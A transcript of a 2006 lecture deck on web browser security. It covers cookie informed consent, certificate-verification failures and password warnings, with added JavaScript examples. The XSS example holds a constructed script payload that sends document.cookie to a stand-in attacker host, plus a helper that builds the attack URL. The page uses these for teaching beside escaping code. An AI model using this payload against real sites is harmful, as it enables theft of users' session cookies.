Web browser privacy and security
Published on www.secguru.com
  • Transcript

    • 1. Web browser privacy and security (I). March 21st, 2006. Ricardo Villamarin-Salomon
    • 2. Outline
      • Web Browser Insecurity
      • Informed Consent by Design
      • Hardening Web Browsers Against Man in the Middle and Eavesdropping Attacks
      • Participation
    • 3. Web Browser Insecurity
      • Targeted attacks on Web applications and Web browsers are increasingly becoming the focal point for cyber criminals.
        • Traditional attack activity: motivated by curiosity and a desire to show off technical virtuosity
        • Current threats are motivated by profit: identity theft, extortion and fraud, for financial gain
    • 4. Worry-free web? (Source: secunia.com, 2006-March-19. Original idea: ZDNet.com; revised and updated March 2006 by the presenter.)
    • 5. Web Browser vulnerabilities, vendor confirmed Source: Symantec Internet Security Threat Report (Vol. IX)
    • 6. Web Browser vulnerabilities, confirmed & non-confirmed by vendor Source: Symantec Internet Security Threat Report (Vol. IX)
    • 7. Some Common Vulnerabilities (CERT)
      • ActiveX Controls
      • Java applets (bypassing of sandbox’s restrictions)
      • Cross-Site Scripting (mainly faults of web sites)
        • e.g., http://host.com/modules.php?op=modload&name=XForum&file= [hostilejavascript] &fid=2
      • Cross-Zone and Cross-Domain Vulnerabilities
        • The mechanism that prevents a web site from accessing data in a different domain (or zone) is broken
      • Malicious Scripting, Active Content, and HTML
      • Spoofing: as it relates to web browsers, spoofing is a term used to describe methods of faking various parts of the browser user interface
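As an added illustration of the cross-site scripting item above (example code written for this page, not CERT's or the slides' code): a page that reflects the `file` parameter of the URL shape shown, first as written and then with HTML escaping. The page layout, the `escapeHtml` helper and the hostile payload are constructed for the example.

```javascript
// Added example: reflected XSS in a page that echoes the "file" parameter.
// The page layout, escapeHtml helper and payload are constructed for this
// example; they are not CERT's or the slides' code.

// Constructed hostile payload standing in for "[hostilejavascript]".
const HOSTILE_JS =
  '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>';

// Parse the query string of a URL such as
// http://host.com/modules.php?op=modload&name=XForum&file=...&fid=2
function parseQuery(url) {
  return Object.fromEntries(new URL(url).searchParams);
}

// Vulnerable: the untrusted parameter is concatenated straight into HTML,
// so any markup it carries becomes part of the page the victim's browser runs.
function renderVulnerable(params) {
  return `<h1>${params.name}: ${params.file}</h1>`;
}

// Hardened: escape the HTML-significant characters before reflection, so the
// browser shows the payload as text instead of executing it.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}
function renderHardened(params) {
  return `<h1>${escapeHtml(params.name)}: ${escapeHtml(params.file)}</h1>`;
}

// Detection helper: does the rendered HTML contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Build the attack URL exactly as a phishing link would carry it.
function attackUrl(payload = HOSTILE_JS) {
  return 'http://host.com/modules.php?op=modload&name=XForum&file=' +
         encodeURIComponent(payload) + '&fid=2';
}
```

The escaping belongs to the site, which is why the slide files XSS under "mainly faults of web sites": the browser has no way to tell the reflected script from the site's own.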
    • 8. Informed Consent for Information Systems Batya Friedman, Peyina Lin, and Jessica K. Miller
    • 9. Value Sensitive Design
      • Design of Information and Computer Systems that accounts for human values
      • Value Sensitive Design is an interactional theory
        • In general, we don’t view values as inherent in a given technology
        • However, we also don’t view a technology as value-neutral
        • Rather, some technologies are more suitable than others for supporting given values
      • Key task of VSD: Investigate these “value suitabilities” (along with what values and whose values)
      © Batya Friedman 2003
    • 10. VSD’s Tripartite Methodology
      • Conceptual investigations
        • Philosophically informed analyses of the values and value conflicts involved in the system
      • Technical investigations
        • Identify existing or develop new technical mechanisms; investigate their suitability to support or not support the values we wish to further
      • Empirical investigations
        • Using techniques from the social sciences, investigate issues such as: Who are the stakeholders? Which values are important to them? How do they prioritize these values?
      • These are applied iteratively and integratively
      © Batya Friedman 2003
    • 11. Direct and Indirect Stakeholders
      • Direct stakeholders: Interact with the system being designed and its outputs
      • Indirect stakeholders: Don’t interact directly with the system, but are affected by it in significant ways
      © Batya Friedman 2003
    • 12. Model of Informed Consent for Information Systems
      • Disclosure
      • Comprehension
      • Voluntariness
      • Competence
      • Agreement
      • Minimal Distraction
    • 13. Netscape (NS) 3.04 Cookie Warning Dialog Box
    • 14. Netscape (NS) 4.03 Cookie Settings
    • 15. IE 4.0 Cookie Warning Dialog Box
    • 16. IE 5.0 Custom Cookie Settings
    • 17. The Unique Role of the Web Browser
      • Browser software mediates communication between a client (typically an end user) and a server
      • After a remote site has exercised a capability, the Web browser software has no control over what the remote site does with the information or other actions that the site may take.
    • 18. The Unique Role of the Web Browser
      • With respect to Informed Consent
        • Disclosure:
          • Whether the user is notified about a server request
          • Harms / benefits?
        • Comprehension (to a large extent):
          • The browser controls the content of the notification (if any)
        • Agreement:
          • User’s opportunity to agree/decline to place a cookie (prompting)
          • Ongoing : how to withdraw from agreement (obscure locations)?
    • 19. The Unique Role of the Web Browser
      • With respect to Informed Consent
        • Minimal distraction
          • IE: the user accepts or declines third-party cookies one by one
        • Voluntariness?
          • Browser or Website?
        • Competence (cookies)?
          • Browser or Website?
    • 20. Design Goals
      • Enhance users’ local understanding of cookie events as the events occur with minimal distraction to the user
        • Preset agreement policy that applies to all cookies of a specified type
          • Minimizes user distraction at the expense of rote decision-making, disclosure and comprehension
        • Explicitly accept or decline each cookie one at a time
          • Supports the criterion of disclosure but at the expense of extreme distraction
        • Middle ground?
    • 21. Design Goals
      • Enhance users’ global understanding of the common uses of cookie technology
        • Including potential benefits and risks associated with those uses
        • A necessary piece of disclosure and comprehension
    • 22. Design Goals
      • Enhance users’ ability to manage cookies
        • Particularly with respect to the easy viewing of cookie information and on-going control over the lifetime and removal of cookies.
        • Agreement is ongoing: the user had no easy means (with 1999 browser technology) to remove previously set cookies and thereby revoke consent
      • Achieve design goals 1, 2 and 3 while minimizing distraction for the user
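As an added example of the three design goals (written for this page; it is not the Cookie-Panel extension's code): a cookie jar that applies a preset agreement policy per cookie type, counts how often the user still has to be prompted, and lets stored cookies be listed and removed so that consent can be withdrawn later. The Set-Cookie parsing follows RFC 6265 loosely; the policy shape, the type names and the sample cookies are assumptions.

```javascript
// Added example: preset cookie-agreement policy by cookie type, with prompt
// counting and removal. Not the Cookie-Panel extension's code; policy shape,
// type names and the sample cookies in the usage are assumptions.

// Site of a host, simplified to its last two labels (no public-suffix list).
function siteOf(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// Parse one Set-Cookie header received from responseHost while the user is
// viewing a page on pageHost.
function parseSetCookie(header, responseHost, pageHost) {
  const [nameValue, ...attrs] = header.split(';').map(s => s.trim());
  const eq = nameValue.indexOf('=');
  const cookie = {
    name: nameValue.slice(0, eq), value: nameValue.slice(eq + 1),
    domain: responseHost.toLowerCase(), persistent: false, secure: false,
  };
  for (const attr of attrs) {
    const [k, v = ''] = attr.split('=');
    switch (k.toLowerCase()) {
      case 'expires': case 'max-age': cookie.persistent = true; break; // outlives the session
      case 'domain': cookie.domain = v.replace(/^\./, '').toLowerCase(); break;
      case 'secure': cookie.secure = true; break;
    }
  }
  cookie.party = siteOf(cookie.domain) === siteOf(pageHost) ? 'first' : 'third';
  return cookie;
}

// Cookie type = who sets it + how long it lives, e.g. "third-persistent".
function cookieType(c) {
  return `${c.party}-${c.persistent ? 'persistent' : 'session'}`;
}

// Preset policy: one decision per type. "prompt" is the per-cookie dialog of
// slide 20; every other type is decided without distracting the user.
const DEFAULT_POLICY = {
  'first-session': 'accept', 'first-persistent': 'accept',
  'third-session': 'decline', 'third-persistent': 'prompt',
};

class CookieJar {
  constructor(policy = DEFAULT_POLICY, ask = () => false) {
    this.policy = policy; this.ask = ask; this.cookies = []; this.prompts = 0;
  }
  // Returns the decision taken for the offered cookie.
  offer(header, responseHost, pageHost) {
    const c = parseSetCookie(header, responseHost, pageHost);
    let decision = this.policy[cookieType(c)] || 'prompt';
    if (decision === 'prompt') {            // only here does the user see a dialog
      this.prompts += 1;
      decision = this.ask(c) ? 'accept' : 'decline';
    }
    if (decision === 'accept') this.cookies.push(c);
    return decision;
  }
  // Easy viewing of what is stored (design goal 3).
  list() {
    return this.cookies.map(c => ({ name: c.name, domain: c.domain, type: cookieType(c) }));
  }
  // Withdrawing consent: drop all cookies of a domain, or one by name.
  remove(domain, name) {
    const before = this.cookies.length;
    this.cookies = this.cookies.filter(c =>
      !(c.domain === domain && (name === undefined || c.name === name)));
    return before - this.cookies.length;
  }
}
```

The `prompts` counter is the distraction cost of a policy: with the default above, only third-party persistent cookies ever reach the user, which is the "middle ground" between rote per-type decisions and a dialog for every cookie.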
    • 23. © Batya Friedman 2003
    • 24. © Batya Friedman 2003
    • 25. © Batya Friedman 2003
    • 26. © Batya Friedman 2003
    • 27. © Batya Friedman 2003
    • 28.  
    • 29.  
    • 30. Renamed to “Cookie-Panel”
      • https://addons.mozilla.org/extensions/moreinfo.php?id=1375
    • 31. Secure Connections: Informing through Interaction Design
    • 32. Secure Connections: Different Evidences
      • Firefox: "... we turn the entire address bar a bright shade of yellow at secure sites. It's impossible to miss; the connection with the page 'is clear' because it highlights the page address; and it's 'obvious' what it means because it's punctuated by a large lock." - Blake Ross
      • IE 7 Beta: for a suspicious (!) site, the address bar turns yellow and displays a warning label, but still allows data entry
      [Screenshots: Firefox, IE 7 Beta]
    • 33. Secure Connections: Your opinion?
      • Indicators that fit in the status bar (IE 6):
        • No encryption
        • Secure connection (certificate is OK)
        • "Secure" connection (problem with certificate)
    • 34. GMail: Questions related to Informed Consent
      • Machines reading personal content
        • … a privacy violation concerns the act of intrusion upon the self, independent of the state of mind (or knowledge) of the intruder - Edward Bloustein
        • Spam filters?
      • Indirect stakeholders
        • Targeted advertisements should not be allowed without the consent of all parties involved in an email exchange; Gmail does not obtain the consent of the email sender. How could it?
        • Automatic reply: once (the first time) and for all, make the sender agree to the Gmail TOS (similar to how mailblocks.com verified that an email was sent by a human)
    • 35. Hardening Web Browsers Against Man in the Middle and Eavesdropping Attacks Haidong Xia and Jose Carlos Brustoloni
    • 36. Usability of Web Browser security
      • Man-In-The-Middle (MITM) attacks
      • Eavesdropping attacks
      • Several tools available
    • 37. Man-In-The-Middle (MITM) attacks
      • The public keys of major CAs (e.g., Verisign) are embedded in many client applications (e.g.,Web browsers).
    • 38. Common sources of certificate verification failure
      • The browser may not know the public key of the CA that issued the server's certificate
        • Typical for an internal web server (used only by members of the organization)
        • The organization runs its own CA: if its public key is installed in the browser there are no verification errors
        • Pre-installing it is hard with a large number of users or user-owned computers
      • The issuer's or the server's certificate may be expired
    • 39. Common sources of certificate verification failure
      • The server may have presented a certificate whose common name field does not match the server's fully qualified domain name
        • An attacker can obtain a CA-issued certificate under his own identity
        • The attacker may have stolen the certificate (along with the private key)
        • Mismatches at the subdomain level are not very risky (unless a very sophisticated attack is mounted)
          • Allow the user to proceed
        • Other cases are more serious
          • Ch. 28
    • 40. Common sources of certificate verification failure
    • 41. Common sources of certificate verification failure
    • 42. Context Sensitive Certificate Verification
      • Clarify the relationship between the user and the server's (unverified) certificate
        • Do not give the user an override mechanism
      • Distribute signed certificates of the internal servers out of band
      • Take advantage of typically unused certificate fields:
        • CA's contact information (field: issuer alternative name)
        • CA administrator's name, address, telephone and fax numbers, and work hours
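As an added example of the decision logic in slides 38-42 (written for this page; it is not the authors' CSCV implementation): a verifier that classifies a server certificate against the listed failure sources and returns the action the slides prescribe, with the CA contact from the issuer alternative name surfaced instead of a generic "proceed anyway?" override. The certificate object shape, the trusted-CA list, the remediation wording and the sample certificates in the usage are assumptions.

```javascript
// Added example: a context-sensitive verifier in the spirit of CSCV. Not the
// authors' implementation; the certificate object shape, trusted-CA list,
// remediation wording and sample certificates are assumptions.

// Does a certificate name (possibly a wildcard) cover the host?
function nameMatches(pattern, host) {
  pattern = pattern.toLowerCase(); host = host.toLowerCase();
  if (pattern.startsWith('*.')) {
    const parent = pattern.slice(2);
    return host.endsWith('.' + parent) &&
           !host.slice(0, host.length - parent.length - 1).includes('.');
  }
  return pattern === host;
}

// "Subdomain level" mismatch: same parent domain, different left-most label
// (e.g. mail.example.edu vs www.example.edu). The slides treat this as low risk.
function subdomainLevelMismatch(certName, host) {
  const a = certName.toLowerCase().split('.'), b = host.toLowerCase().split('.');
  return a.length === b.length && a.length >= 3 &&
         a[0] !== b[0] && a.slice(1).join('.') === b.slice(1).join('.');
}

// Classify a server certificate against the failure sources of slides 38-39.
function findProblems(cert, host, trustedCAs, now) {
  const problems = [];
  if (!trustedCAs.includes(cert.issuer)) problems.push('unknown_issuer');
  if (now < new Date(cert.notBefore) || now > new Date(cert.notAfter)) problems.push('expired');
  const names = [cert.subjectCN, ...(cert.subjectAltNames || [])];
  if (!names.some(n => nameMatches(n, host))) {
    problems.push(subdomainLevelMismatch(cert.subjectCN, host) ? 'subdomain_mismatch' : 'name_mismatch');
  }
  return problems;
}

// Decide what the browser does. Instead of a generic override dialog the
// result carries context: what is wrong and how to fix it out of band.
function verify(cert, host, trustedCAs, now = new Date()) {
  const problems = findProblems(cert, host, trustedCAs, now);
  if (problems.length === 0) return { action: 'connect', problems };
  if (problems.length === 1 && problems[0] === 'subdomain_mismatch') {
    return { action: 'warn_and_allow', problems,
             message: `Certificate is for ${cert.subjectCN}, not ${host}` };
  }
  const steps = [];
  if (problems.includes('unknown_issuer')) {
    const contact = cert.issuerAltName;   // the usually empty field CSCV relies on
    steps.push(contact
      ? `Obtain and install the certificate of "${cert.issuer}" out of band; CA contact: ${contact}`
      : `Unknown CA "${cert.issuer}" and no contact information; treat the site as an impostor`);
  }
  if (problems.includes('expired')) {
    steps.push(`Certificate validity ended ${cert.notAfter}; ask the site administrator to renew it`);
  }
  if (problems.includes('name_mismatch')) {
    steps.push(`Certificate was issued to ${cert.subjectCN}, not ${host}; possible man-in-the-middle`);
  }
  return { action: 'block', override: false, problems, steps };   // no override mechanism
}
```

Note the asymmetry the slides ask for: an unknown internal CA with contact details leads to an out-of-band installation step after which the same certificate verifies cleanly, whereas a bogus certificate with no contact information is blocked outright.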
    • 43. Context Sensitive Certificate Verification
    • 44.  
    • 45.  
    • 46. Specific Passwords Warnings
      • Warn the user before a password is transmitted over an unencrypted (HTTP) connection; helps prevent eavesdropping
      • The user is allowed to override the warning
    • 47. Specific Passwords Warnings
    • 48. Specific Passwords Warnings
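As an added example of the password-warning idea (written for this page; it is not the authors' SPW code): a check run at form submission that raises a warning only when a non-empty password field would actually travel in the clear, resolving the form's action against the page URL so that an HTTP page posting to HTTPS passes and an HTTPS page posting to HTTP does not. The form representation, the warning wording and the per-host override memory are assumptions.

```javascript
// Added example: a specific password warning check. Not the authors' SPW code;
// the form representation, wording and override memory are assumptions.

// Decide whether submitting `form` from `pageUrl` should raise the warning.
// Overrides are remembered per destination host so the user is not nagged twice.
function passwordWarning(pageUrl, form, overrides = new Set()) {
  const target = new URL(form.action || '', pageUrl);   // resolve relative actions
  const pwFields = form.fields.filter(f => f.type === 'password' && f.value !== '');
  if (pwFields.length === 0) return { warn: false, reason: 'no password is being sent' };
  if (target.protocol === 'https:') return { warn: false, reason: 'password travels over TLS' };
  if (overrides.has(target.host)) {
    return { warn: false, reason: `user already chose to trust ${target.host}` };
  }
  return {
    warn: true,
    allowOverride: true,
    reason: `The password in field "${pwFields[0].name}" would be sent unencrypted to ` +
            `${target.host}; an eavesdropper on the network could read it`,
  };
}

// Record the user's override for the form's destination host.
function overrideFor(pageUrl, form, overrides) {
  overrides.add(new URL(form.action || '', pageUrl).host);
  return overrides;
}
```

The warning is "specific" in the sense that it names the password field and the destination host, rather than being the generic "you are about to send information over an insecure connection" dialog that users learn to click through.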
    • 49. User Studies
      • Computer literate users (CLU)
      • Evaluate:
        • Likelihood of successful attack in representative security-sensitive Web applications
        • Possibility of “foolproofing” web browsers, so they can be used securely even by untrained CLUs
        • Can education about the relevant security principles, attacks, and tools improve the security of how users browse the Web?
          • Note: This last hypothesis is not covered in this presentation
    • 50. Study’s Design
      • 17 participants (majors from the University of Pittsburgh's CS department)
      • Two studies:
        • Unmodified browser (IE)
        • Modified Mozilla Firebird 0.6.1 with CSCV and SPW
      • No feedback given between these two studies
    • 51. Study’s Design
      • Visit three fictional but realistic Web sites where students were assigned password protected accounts
      • The first site: maintained by the students’ university.
        • It allows students to monitor the respective reward points (earned by doing well in exams, independent studies, etc.)
        • HTTPS + Certificate issued by internal CA
      • The second site: maintained by a remote e-merchant not affiliated with the university
        • Students can spend their reward points, (e.g. to buy books, CDs, etc.)
        • HTTPS + bogus certificate
      • The third site provides access to users’ Web email accounts
        • HTTP only (no certificate)
    • 52. Study's Design: scoring of user actions
      User's action                                                    Score (points)
      Correctly obtained and installed the issuing CA's certificate    100
      Chose not to access the 2nd and 3rd sites insecurely             100
      Simply did not visit the site insecurely                          50
      Accessed a site despite lack of security                           0
    • 53. Study’s Results
      • With current users and Web browsers, the mentioned attacks are alarmingly likely to succeed.
        • More often than not, users’ behavior defeats the existing Web security mechanisms.
      • CSCV blocked MITM attacks against HTTPS-based applications completely.
      • SPW greatly reduced the insecure transmission of passwords in an HTTP-based application
      • Although untrained, users had little trouble using CSCV and SPW.
    • 54. Participation
    • 55. Disagreements about Secure Connections
      • Propose some ideas for representing secure connections in web browsers
    • 56. Thank you!